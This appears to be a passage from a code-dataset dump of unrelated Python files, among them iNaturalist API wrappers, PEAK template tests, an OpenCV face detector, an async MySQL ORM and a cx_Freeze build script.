get_places_autocomplete('Irkutsk')\n >>> print(format_places(response))\n [11803 ] Irkutsk\n [41854 ] Irkutskiy rayon\n [166186 ] Irkutsk Oblast - ADD\n [163077 ] Irkutsk agglomeration\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_places_autocomplete.py\n\n Args:\n q: Name must begin with this value\n\n Returns:\n Response dict containing place records\n \"\"\"\n r = node_api_get('places/autocomplete', params={'q': q, **params})\n r.raise_for_status()\n\n # Convert coordinates to floats\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n return response\n\n\n# Projects\n# --------------------\n\n\n@document_request_params([docs._projects_params, docs._pagination])\n@add_paginate_all(method='page')\ndef get_projects(**params) -> JsonResponse:\n \"\"\"Given zero to many of following parameters, get projects matching the search criteria.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Projects/get_projects\n\n Example:\n\n Search for projects about invasive species within 400km of Vancouver, BC:\n\n >>> response = get_projects(\n >>> q='invasive',\n >>> lat=49.27,\n >>> lng=-123.08,\n >>> radius=400,\n >>> order_by='distance',\n >>> )\n\n Show basic info for projects in response:\n\n >>> print(format_projects(response, align=True))\n [8291 ] PNW Invasive Plant EDDR\n [19200 ] King County (WA) Noxious and Invasive Weeds\n [102925 ] Keechelus/Kachess Invasive Plants\n ...\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_projects.py\n\n Returns:\n Response dict containing project records\n \"\"\"\n validate_multiple_choice_param(params, 'order_by', PROJECT_ORDER_BY_PROPERTIES)\n r = node_api_get('projects', params=params)\n r.raise_for_status()\n\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n response['results'] = convert_all_timestamps(response['results'])\n return response\n\n\ndef get_projects_by_id(\n project_id: MultiInt, rule_details: bool = None, user_agent: str = None\n) -> JsonResponse:\n \"\"\"Get one or more projects by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Projects/get_projects_id\n\n Example:\n\n >>> response = get_projects_by_id([8348, 6432])\n >>> print(format_projects(response))\n [8348] Tucson High Native and Invasive Species Inventory\n [6432] CBWN Invasive Plants\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_projects_by_id.py\n\n Args:\n project_id: Get projects with this ID. Multiple values are allowed.\n rule_details: Return more information about project rules, for example return a full taxon\n object instead of simply an ID\n\n Returns:\n Response dict containing project records\n \"\"\"\n r = node_api_get(\n 'projects',\n ids=project_id,\n params={'rule_details': rule_details},\n user_agent=user_agent,\n )\n r.raise_for_status()\n\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n response['results'] = convert_all_timestamps(response['results'])\n return response\n\n\n# Taxa\n# --------------------\n\n\n@document_request_params([docs._taxon_params, docs._taxon_id_params, docs._pagination])\n@add_paginate_all(method='page')\ndef get_taxa(**params) -> JsonResponse:\n \"\"\"Given zero to many of following parameters, get taxa matching the search criteria.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa\n\n Example:\n\n >>> response = get_taxa(q='vespi', rank=['genus', 'family'])\n >>> print(format_taxa(response))\n [52747] Family: Vespidae (Hornets, Paper Wasps, Potter Wasps, and Allies)\n [92786] Genus: Vespicula\n [646195] Genus: Vespiodes\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa.json\n :language: JSON\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('taxa', params=params)\n r.raise_for_status()\n\n taxa = r.json()\n taxa['results'] = convert_all_timestamps(taxa['results'])\n return taxa\n\n\ndef get_taxa_by_id(taxon_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"Get one or more taxa by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa_id\n\n Example:\n\n >>> response = get_taxa_by_id(343248)\n >>> basic_fields = ['preferred_common_name', 'observations_count', 'wikipedia_url', 'wikipedia_summary']\n >>> print({f: response['results'][0][f] for f in basic_fields})\n {\n 'preferred_common_name': 'Paper Wasps',\n 'observations_count': 69728,\n 'wikipedia_url': 'http://en.wikipedia.org/wiki/Polistinae',\n 'wikipedia_summary': 'The Polistinae are eusocial wasps closely related to yellow jackets...',\n }\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa_by_id.py\n\n Args:\n taxon_id: Get taxa with this ID. Multiple values are allowed.\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n r = node_api_get('taxa', ids=taxon_id, user_agent=user_agent)\n r.raise_for_status()\n\n taxa = r.json()\n taxa['results'] = convert_all_timestamps(taxa['results'])\n return taxa\n\n\n@document_request_params([docs._taxon_params])\ndef get_taxa_autocomplete(**params) -> JsonResponse:\n \"\"\"Given a query string, return taxa with names starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Taxa/get_taxa_autocomplete\n\n **Note:** There appears to currently be a bug in the API that causes ``per_page`` to not have\n any effect.\n\n Example:\n\n Get just the name of the first matching taxon:\n\n >>> response = get_taxa_autocomplete(q='vespi')\n >>> print(response['results'][0]['name'])\n 'Vespidae'\n\n Get basic info for taxa in response:\n\n >>> print(format_taxa(response, align=True))\n [52747 ] Family: Vespidae (Hornets, Paper Wasps, Potter Wasps, and Allies)\n [84738 ] Subfamily: Vespinae (Hornets and Yellowjackets)\n [131878 ] Species: Nicrophorus vespillo (Vespillo Burying Beetle)\n\n If you get unexpected matches, the search likely matched a synonym, either in the form of a\n common name or an alternative classification. Check the ``matched_term`` property for more\n info. For example:\n\n >>> first_result = get_taxa_autocomplete(q='zygoca')['results'][0]\n >>> first_result[\"name\"]\n \"Schlumbergera truncata\" # This doesn't look like our search term!\n >>> first_result[\"matched_term\"]\n \"Zygocactus truncatus\" # ...Because it matched an older synonym for Schlumbergera\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa_autocomplete.py\n\n .. admonition:: Example Response (formatted)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_taxa_autocomplete_minified.py\n\n Returns:\n Response dict containing taxon records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('taxa/autocomplete', params=params)\n r.raise_for_status()\n return r.json()\n\n\n# Users\n# --------------------\n\n\ndef get_user_by_id(user_id: int, user_agent: str = None) -> JsonResponse:\n \"\"\"Get a user by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Users/get_users_id\n\n Args:\n user_id: Get the user with this ID. Only a single ID is allowed per request.\n\n Example:\n\n >>> response = get_user_by_id(123456)\n >>> print(format_users(response))\n [1234] my_username\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_user_by_id.py\n\n Returns:\n Response dict containing user record\n \"\"\"\n r = node_api_get('users', ids=[user_id], user_agent=user_agent)\n r.raise_for_status()\n results = r.json()['results']\n if not results:\n return {}\n return convert_generic_timestamps(results[0])\n\n\n@document_request_params([docs._search_query, docs._project_id, docs._pagination])\ndef get_users_autocomplete(q: str, **params) -> JsonResponse:\n \"\"\"Given a query string, return users with names or logins starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Users/get_users_autocomplete\n\n Note: Pagination is supported; default page size is 6, and max is 100.\n\n Example:\n\n >>> response = get_taxa_autocomplete(q='my_userna')\n >>> print(format_users(response))\n [1234] my_username\n [12345] my_username_2\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_users_autocomplete.py\n\n Returns:\n Response dict containing user records\n \"\"\"\n r = node_api_get('users/autocomplete', params={'q': q, **params})\n r.raise_for_status()\n users = r.json()\n users['results'] = convert_all_timestamps(users['results'])\n return users\n\n\n# Main Search\n# --------------------\n\n\n@document_request_params([docs._search_params, docs._pagination])\ndef search(q: str, **params) -> JsonResponse:\n \"\"\"A unified search endpoint for places, projects, taxa, and/or users\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Search/get_search\n\n Example:\n\n >>> response = search(q='odonat')\n >>> print(format_search_results(response, align=True))\n [Taxon ] [47792 ] Order: Odonata (Dragonflies and Damselflies)\n [Place ] [113562 ] Odonates of Peninsular India and Sri Lanka\n [Project] [9978 ] Ohio Dragonfly Survey (Ohio Odonata Survey)\n [User ] [113886 ] odonatanb (Gilles Belliveau)\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_search.py\n\n Returns:\n Response dict containing search results\n \"\"\"\n r = node_api_get('search', params={'q': q, **params})\n r.raise_for_status()\n search_results = r.json()\n search_results['results'] = convert_all_timestamps(search_results['results'])\n search_results['results'] = convert_all_coordinates(search_results['results'])\n return search_results\n","sub_path":"pyinaturalist/node_api.py","file_name":"node_api.py","file_ext":"py","file_size_in_byte":30616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"138944218","text":"from PIL import Image\nfrom PIL import ImageOps\nimport csv\n \ncsvfile = open('/Users/maliokodis/NASANEOdata.csv', 'rU') \nreader = csv.reader(csvfile)\nstringRead = []\nfor row in reader:\n stringRead.append(row)\ncsvfile.close()\n\nfinalRead = []\nfor stringRow in stringRead:\n numRow = []\n for stringElem in stringRow:\n val = float(stringElem)\n numRow.append(val)\n finalRead.append(numRow)\n\nnumRows = len(finalRead)\nnumCols = len(finalRead[0])\nimg = Image.new('RGB', (numRows, numCols), \"black\")\npixels = img.load()\n\nfor i in range(img.size[0]):\n for j in range(img.size[1]):\n if finalRead[i][j] <= -20:\n pixels[i,j] = (10, 0, 0)\n elif finalRead[i][j] <= 100:\n pixels[i,j] = (0, 0, 225)\n else:\n pixels[i,j] = (0, 225, 0)\n\nImageOps.mirror(img.rotate(270)).show()","sub_path":"DataViz_Files/Code/codingClimate.py","file_name":"codingClimate.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"321463318","text":"\"\"\"\nex04_sigmoid.py\nsigmoid 함수: y = 1 / (1 + exp(-x))\ndy/dx = y(1 - y) 증명\nsigmoid 뉴런을 작성(forward, backward)\n\"\"\"\nimport numpy as np\n\nfrom ch03.ex01 import sigmoid\n\n\nclass Sigmoid:\n def __init__(self):\n # forward 메소드의 리턴값 y를 저장하기 위한 field\n self.y = None\n\n def forward(self, x):\n y = 1 / (1 + np.exp(-x))\n self.y = y\n return y\n\n def backward(self, dout):\n return dout * self.y * (1 - self.y)\n\n\nif __name__ == '__main__':\n # Sigmoid 뉴런을 생성\n sigmoid_gate = Sigmoid()\n # x = 1일 때 sigmoid 함수의 리턴값(forward)\n y = sigmoid_gate.forward(x=0.0)\n print('y =', y) # x = 0일 때 sigmoid(0) = 0.5\n\n # x = 0에서의 sigmoid의 gradient(접선의 기울기)\n dx = sigmoid_gate.backward(dout=1.)\n print('dx =', dx)\n\n # 아주 작은 h에 대해서 [f(x + h) - f(x)]/h를 계산\n h = 1e-7\n dx2 = (sigmoid(0. + h) - sigmoid(0.)) / h\n print('dx2 =', dx2)\n\n","sub_path":"ch05/ex04_sigmoid.py","file_name":"ex04_sigmoid.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653031062","text":"\"\"\"Template tests\n\nTODO\n\n - Mixed namespaces\n\n - DOMlet property redefinition within a component\n\n - Security used\n\n - DOCTYPE\n\"\"\"\n\nfrom unittest import TestCase, makeSuite, TestSuite\nfrom peak.api import *\nfrom peak.tests import testRoot\nfrom cStringIO import StringIO\nimport peak.web.templates as pwt\nfrom urllib import quote\n\nclass TestApp(web.Location):\n\n binding.metadata(\n foo = security.Anybody,\n bar = security.Anybody,\n someXML = security.Anybody,\n baz = security.Nobody,\n )\n\n foo = \"The title (with & such in it)\"\n baz = \"can't touch this!\"\n bar = 1,2,3\n\n someXML = \"

  • This has <xml/> in it
  • \"\n\n show = binding.Require(\n \"Template to dump this out with\",\n [security.Anybody]\n )\n\n\nclass BasicTest(TestCase):\n\n template = \"pkgfile:peak.web.tests/template1.pwt\"\n\n rendered = \"\"\"\nTemplate test: The title (with <xml/> & such in it)\n\n\n

    The title (with <xml/> & such in it)

    \n
    • 1
    • 2
    • 3
    \n
    • This has <xml/> in it
    \n
    • This has <xml/> in it
    \n\n\"\"\"\n\n def setUp(self):\n r = testRoot()\n app = TestApp(r, show = self.mkTemplate())\n self.policy = web.TestPolicy(app)\n\n def mkTemplate(self):\n return config.processXML(\n web.TEMPLATE_SCHEMA(testRoot()), self.template,\n pwt_document=web.TemplateDocument(testRoot())\n )\n\n def render(self):\n return self.policy.simpleTraverse('show')\n\n def testRendering(self):\n self.assertEqual(self.render(),self.rendered)\n\n\n\n\n\n\n\n\n\n\nclass NSTest(BasicTest):\n\n template = \"data:,\"+quote(\"\"\"\n

    Title Goes Here

    \n
      \n
    • \n
    \n\"\"\")\n\n rendered = \"\"\"\n

    The title (with <xml/> & such in it)

    \n
    • 1
    • 2
    • 3
    \n\"\"\"\n\n\nclass NSTest2(NSTest):\n\n template = \"data:,\"+quote(\"\"\"\n

    Title Goes Here

    \n
      \n
    • foo
    • \n
    \n\"\"\")\n\nclass ListHeaderFooterTest(BasicTest):\n template = \"data:,\"+quote(\"\"\"
  • Header
  • Footer
  • \"\"\")\n\n rendered = \"
    • Header
    • 1
    • 2
    • 3
    • \" \\\n \"
    • Footer
    \"\n\n\n\n\n\n\n\n\n\nclass MiscTests(TestCase):\n\n def setUp(self):\n self.app = TestApp(testRoot())\n self.policy = web.TestPolicy(self.app)\n self.ctx = self.policy.newContext()\n\n def testParameters(self):\n\n class MockTemplate:\n protocols.advise(instancesProvide=[web.IDOMletRenderable])\n renderCt = 0\n def renderFor(_self,ctx,state):\n self.assert_(ctx is self.ctx)\n self.assertEqual(state,123)\n _self.renderCt+=1\n\n t = MockTemplate()\n p = pwt.Parameters(self.ctx,{'t':t, 'p':u'bar', 'd':123})\n ctx = self.ctx.childContext('xyz',p)\n c2 = ctx.traverseName('t')\n\n # Test a second time to ensure that result is cached\n c2 = ctx.traverseName('t')\n\n # It should render with the original context\n c2.current.renderFor(c2,123)\n\n # and the mock 'renderFor' should have been called exactly once:\n self.assertEqual(t.renderCt, 1)\n\n # Paths should be traversed from the start point\n c2 = ctx.traverseName('p')\n self.assertEqual(c2.current, (1,2,3))\n\n # And data should just be returned\n c2 = ctx.traverseName('d')\n self.assertEqual(c2.current, (123))\n\n\n\n def renderDoc(self,doc):\n ctx = self.ctx.childContext('x',doc)\n ctx.shift() # get rid of 'index.html'\n return ctx.renderHTTP()\n\n def renderFragment(self,doc):\n ctx = self.ctx.childContext('x',doc)\n ctx.shift() # get rid of 'index.html'\n data = []\n doc.renderFor(ctx, pwt.DOMletState(doc, write=data.append))\n return ''.join(data)\n\n def testContentType(self):\n s,h,b = self.renderDoc(\n pwt.TemplateDocument(\n self.app,\n content_type='text/plain', params={'page-layout':'/default'}\n )\n )\n self.assertEqual(h,[('Content-type','text/plain')])\n\n\n def testRenderFragment(self):\n doc = pwt.TemplateDocument(self.app,params={'page-layout':'/default'})\n doc.addChild(pwt.Literal(doc,xml=\"foo\"))\n doc.fragment = pwt.Literal(doc,xml=\"bar\")\n doc.addChild(doc.fragment)\n s,h,b = self.renderDoc(doc)\n self.assertEqual(''.join(b), \"foobar\")\n self.assertEqual(self.renderFragment(doc), \"bar\")\n\n def testRenderPage(self):\n doc = pwt.TemplateDocument(self.app)\n doc.addChild(pwt.Literal(doc,xml=\"foo\"))\n doc.page = pwt.Literal(doc,xml=\"bar\")\n doc.addChild(doc.page)\n s,h,b = self.renderDoc(doc)\n self.assertEqual(''.join(b), \"bar\")\n\n\n\n def testNonRendering(self):\n doc = pwt.TemplateDocument(self.app,fragment=None)\n self.assertRaises(TypeError,self.renderFragment,doc)\n doc = pwt.TemplateDocument(self.app,page=None)\n self.assertRaises(web.UnsupportedMethod,self.renderDoc,doc)\n\n\n def testUses(self):\n for kind in pwt.Uses, pwt.Unless:\n for path in \"spammity-whiz\",\"foo\":\n doc = pwt.TemplateDocument(self.app)\n uses = kind(doc,dataSpec=path,tagName=None,attribItems=())\n uses.addChild(pwt.Literal(uses,xml=\"foo\"))\n doc.addChild(uses)\n txt = self.renderFragment(doc)\n if (path==\"foo\") == (kind is pwt.Uses):\n self.assertEqual(txt, \"foo\")\n else:\n self.assertEqual(txt, \"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass ParserTests(TestCase):\n\n def setUp(self,**kw):\n self.xml_parser = config.XMLParser(\n web.TEMPLATE_SCHEMA(testRoot()),\n pwt_document = web.TemplateDocument(testRoot()),\n **kw\n )\n self.parse = self.xml_parser.parse\n self.nparser = nparser = self.xml_parser.makeParser()\n self.startElement = nparser.startElement\n self.endElement = nparser.endElement\n nparser._beforeParsing(self.xml_parser.parseFunctions())\n self.finish = nparser._afterParsing\n self.policy = web.TestPolicy(TestApp(testRoot()))\n\n def testInvalidArgs(self):\n self.startElement('ul',['content:list','bar'])\n\n # Unrecognized argument for 'list'\n self.startElement('li',['this:is','invalid'])\n self.assertRaises(SyntaxError,self.endElement)\n\n # Multiple 'header' definitions\n self.startElement('li',['this:is','header'])\n self.endElement()\n self.startElement('li',['this:is','header'])\n self.assertRaises(SyntaxError,self.endElement)\n\n\n\n\n\n\n\n\n\n\n\n\n\n def testLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\n \"\"\"\"\"\"))\n\n self.assertEqual(doc.content_type,\"text/plain\")\n self.assert_(isinstance(doc.content_type,str))\n self.assert_(isinstance(doc.page,pwt.Replace))\n self.assert_(isinstance(doc.fragment,pwt.Replace))\n\n page = doc.params['page']\n fragment = doc.params['fragment']\n self.assert_(fragment.getParentComponent() is page)\n\n # We used 'layout' options, so page/frag attrs will be driven by those\n self.assert_(doc.fragment.getParentComponent() is doc)\n self.assert_(doc.page.getParentComponent() is doc)\n\n\n def testNonLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\n \"\"\"\"\"\"))\n self.assert_(isinstance(doc.page,pwt.Element))\n self.assert_(isinstance(doc.fragment,pwt.Element))\n\n # We used non-layout options, so page/frag attrs will be related\n self.assert_(doc.fragment.getParentComponent() is doc.page)\n self.assert_(doc.page.getParentComponent() is doc)\n\n\n def testDefaultLayoutArgs(self):\n doc = self.parse(\"data:,\"+quote(\"\"\"\"\"\"))\n self.assert_(doc.fragment)\n self.assert_(not doc.page)\n\n\n\n\n\nTestClasses = (\n MiscTests, ParserTests, BasicTest, NSTest, NSTest2, ListHeaderFooterTest\n)\n\ndef test_suite():\n return TestSuite([makeSuite(t,'test') for t in TestClasses])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PEAK-0.5a4dev_r2085/src/peak/web/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199743210","text":"import FWCore.ParameterSet.Config as cms\n\nelectronMaker = cms.EDProducer(\n \"ElectronMaker\",\n aliasPrefix = cms.untracked.string(\"els\"),\n # Electron collection\n electronsInputTag = cms.InputTag(\"gsfElectrons\"),\n # Beamspot\n beamSpotInputTag = cms.InputTag(\"beamSpotMaker\"),\n # reco Track collection\n trksInputTag = cms.InputTag(\"generalTracks\"),\n gsftracksInputTag = cms.InputTag(\"electronGsfTracks\"),\n # pfCandidate and Vertex collection\n pfCandsInputTag = cms.InputTag(\"particleFlow\"),\n vtxInputTag = cms.InputTag(\"offlinePrimaryVertices\"),\n\n # isolations from external\n pfIsoCharged03InputTag = cms.InputTag(\"elPFIsoValueCharged03PFIdPFIso\"),\n pfIsoGamma03InputTag = cms.InputTag(\"elPFIsoValueGamma03PFIdPFIso\"),\n pfIsoNeutral03InputTag = cms.InputTag(\"elPFIsoValueNeutral03PFIdPFIso\"),\n pfIsoCharged04InputTag = cms.InputTag(\"elPFIsoValueCharged04PFIdPFIso\"),\n pfIsoGamma04InputTag = cms.InputTag(\"elPFIsoValueGamma04PFIdPFIso\"),\n pfIsoNeutral04InputTag = cms.InputTag(\"elPFIsoValueNeutral04PFIdPFIso\"),\n\n # reco conversions\n recoConversionInputTag = cms.InputTag(\"allConversions\"),\n # egamma ID\n eidLHTag = cms.InputTag(\"egammaIDLikelihood\"),\n cms2scsseeddetidInputTag = cms.InputTag(\"scMaker\"),\n #conversion stuff \n minAbsDist = cms.double(0.02), \n minAbsDcot = cms.double(0.02),\n minSharedFractionOfHits = cms.double(0.45),\n rhoInputTag = cms.InputTag(\"fastJetMaker\", \"evtrho\"),\n beamSpotTag = cms.InputTag(\"offlineBeamSpot\"),\n)\n\n","sub_path":"NtupleMaker/python/electronMaker_cfi.py","file_name":"electronMaker_cfi.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"409450526","text":"import cv2\nimport numpy as np\n\nfaceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nvideo_capture = cv2.VideoCapture(0)\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(gray,1.3,5)\n\n # Draw a rectangle around the faces\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y), (x+w,y+h), (255,0,0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n eyes=eye_cascade.detectMultiScale(roi_gray)\n for(ex,ey,ew,eh) in eyes:\n cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv2.imshow('frame',frame)\n k=cv2.waitKey(30) & 0xff\n if k==27:\n break\n\n# When everything is done, release the capture\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493354689","text":"# day 3 ORM\n# 异步部分\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport aiomysql\n\nasync def create_pool(loop, **kw):\n logging.info('create database connection pool...')\n global __pool\n __pool = await aiomysql.create_pool(\n host = kw.get('host', 'localhost'),\n port = kw.get('port', 3306),\n user = kw['user'],\n password = kw.get('pw',None) or kw.get('password', None),\n db = kw.get('db',None) or kw.get('database', None),\n charset = kw.get('charset', 'utf8'),\n autocommit = kw.get('autocommit', True),\n maxsize = kw.get('maxsize', 10),\n minsize = kw.get('minsize',1),\n loop = loop\n )\n\nasync def select(sql, args, size = None):\n logging.info(sql)\n global __pool\n with (await __pool) as conn:\n cur = await conn.cursor(aiomysql.DictCursor)\n await cur.execute(sql.replace('?', '%s'), args or ())\n if size:\n rs = await cur.fetchmany(size)\n else:\n rs = await cur.fetchall()\n await cur.close()\n logging.info('return %s lines' %len(rs))\n return rs\n\nasync def execute(sql, args):\n logging.info(sql)\n global __pool\n with (await __pool) as conn:\n try:\n cur = await conn.cursor(aiomysql.DictCursor)\n await cur.execute(sql.replace('?', '%s'), args)\n affected = cur.rowcount\n await cur.close()\n except BaseException as e:\n raise e\n return affected \n\n# ORM部分\nclass Field(object):\n def __init__(self, name, column_type, primary_key, default):\n self.name = name\n self.column_type = column_type\n self.primary_key = primary_key\n self.default = default\n def __str__(self):\n return '<%s, %s: %s>' %(self.__class__.__name__, self.column_type, self.name)\nclass StringField(Field):\n def __init__(self, name=None, column_type='varchar(50)',primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n # 等同于 super(StringField, self)...\nclass IntegerField(Field):\n def __init__(self, name=None, column_type='bigint', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\nclass BooleanField(Field):\n def __init__(self, name=None, column_type='tinyint(1)', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\nclass TextField(Field):\n def __init__(self, name=None, column_type='text', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\nclass FloatField(Field):\n def __init__(self, name=None, column_type='floatfield(16,6)', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n\nclass ModelMetaclass(type):\n def __new__(cls, name, base, attrs):\n if name == 'Model':\n return type.__new__(cls, name, base, attrs)\n table_name = attrs.get('__table__', None) or name \n logging.info('Find Model: %s' %name)\n mappings = dict()\n fields = []\n primary_key = None \n for k, v in attrs.items():\n if isinstance(v, Field):\n logging.info('Find Mapping: %s -> %s' %(k, v))\n mappings[k] = v\n if v.primary_key:\n if primary_key:\n raise RuntimeError('Duplicate primary key in field %s and %s' %(primary_key, key))\n else:\n primary_key = k\n else:\n fields.append(k)\n if not primary_key:\n raise RuntimeError('Primary key not found')\n for k in mappings:\n attrs.pop(k)\n escaped_fields = list(map(lambda f: \"`%s`\" %f, fields))\n attrs['__mappings__'] = mappings\n attrs['__table__'] = table_name\n attrs['__primary_key__'] = primary_key\n attrs['__fields__'] = fields\n # 默认的select, insert, update, delete\n attrs['__select__'] = \"select `%s`, %s from `%s`\" %(primary_key, ', '.join(escaped_fields), table_name) \n attrs['__insert__'] = \"insert into `%s` (%s, %s) values (%s)\" %(\n table_name, ', '.join(escaped_fields), primary_key, '?'+',?' * len(escaped_fields))\n attrs['__update__'] = \"update `%s` set %s where `%s`=? \" %(\n table_name, ', '.join(map(lambda f: \"`%s`=?\" % (mappings.get(f).name or f), fields)), primary_key)\n attrs['__delete__'] = \"delete from %s where `%s`=?\" %(table_name, primary_key)\n return type.__new__(cls, name, base, attrs)\n\nclass Model(dict, metaclass = ModelMetaclass):\n def __init__(self, **kw):\n super(Model, self).__init__(**kw)\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Model' object has no attribute %s\" %key)\n\n def __setattr__(self, key, value):\n self[key] = value\n \n def getValue(self, key):\n return getattr(self, key, None)\n\n def getValueOrDefault(self, key):\n value = getattr(self, key, None)\n if value == None:\n field = self.__mappings__[key]\n if field.default is not None:\n logging.debug('use default value for %s: %s' %(key, str(value)))\n value = field.default() if callable(field.default) else field.default\n setattr(self, key, value)\n return value\n\n # 类方法,让所有子类获得方法,例:user = await User.find('123')\n @classmethod\n async def find(cls, primary_key):\n # 按主键查找\n res = await select('%s where `%s`=?' % (cls.__select__, cls.__primary_key__), [primary_key], 1)\n if len(res) == 0:\n return None\n return cls(**res[0]) #返回的是fetchall的结果,所以是[[]]的形式;调用创建类的方法,将res[0]作为kw输入,以获得结果类\n \n # 保存\n async def save(self):\n args = list(map(self.getValueOrDefault, self.__fields__)) \n args.append(self.getValueOrDefault(self.__primary_key__))\n rows = await execute(self.__insert__, args)\n if rows != 1:\n logging.warn('failed to insert rows: affected rows: %s' %rows)\n\n # 自行实现部分:\n @classmethod\n async def __findWhere(cls, s = None, args = None):\n try:\n if not s:\n res = await select('%s' %cls.__select__, ())\n else:\n res = await select('%s where %s' % (cls.__select__, s), args)\n except:\n raise RuntimeError(\"Invalid input 'where' string: %s\" %s)\n if len(res)==0:\n return None\n return [cls(**row) for row in res] \n \n @classmethod\n async def findAll(cls, **kw):\n if len(kw) == 0:\n return await cls.__findWhere()\n fields = []\n args = []\n for key, value in kw.items():\n\n fields.append(key)\n args.append(value)\n s = ' AND '.join(map(lambda f: f+'=?', fields))\n return await cls.__findWhere(s, args)\n\n @classmethod\n async def findAny(cls, **kw):\n fields = []\n args = []\n for key, value in kw.items():\n fields.append(key)\n args.append(value)\n s = ' OR '.join(map(lambda f: f+'=?', fields))\n return await cls.__findWhere(s, args)\n\n @classmethod\n async def delete(cls, primary_key):\n # 按主键删除\n affected = await execute(cls.__delete__, primary_key)\n if affected!=1:\n raise RuntimeError('failed to delete row: affected %s lines' %affected)\n\n async def remove(self):\n # 删除实例\n primary_key = self.getValue(self.__primary_key__)\n affected = await execute(self.__delete__, primary_key)\n if affected!=1:\n raise RuntimeError('failed to delete row: affected %s lines' %affected)\n \n","sub_path":"awesome-python3-webapp/www/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"457381003","text":"import sys\nfrom cx_Freeze import setup, Executable\n\n__author__ = 'Gareth Mok'\n\n# -*- coding: utf-8 -*-\n\n# A simple setup script to create an executable using PyQt4. This also\n# demonstrates the method for creating a Windows executable that does not have\n# an associated console.\n#\n# PyQt4app.py is a very simple type of PyQt4 application\n#\n# Run the build process by running the command 'python setup.py build'\n#\n# If everything works well you should find a subdirectory in the build\n# subdirectory that contains the files needed to run the application\n\n\nbase = None\nif sys.platform == 'win32':\n base = 'Win32GUI'\n\noptions = {\n 'build_exe': {\n 'includes': ['atexit', 'PyQt4'],\n 'include_files': ['credit.txt', 'add_remove_account.ui', 'add_remove_entry.ui',\n 'frame.ui', 'get_database_type.ui', 'get_start_date.ui', 'main.ui',\n 'White_Background_Annuity.png'],\n }\n}\n\nexecutables = [\n Executable('gui_main.py', base=base,\n targetName='Account_Recorder.exe')\n]\n\nincludes = ['PyQt4', 'datetime', 'json', 'os', 'pyqtgraph', 'sys']\n\nsetup(name='Account Recoder',\n version='0.1',\n description='Keeps a simple record of money accounts',\n options=options,\n install_requires=['PyQt4', 'pyqtgraph'],\n executables=executables\n 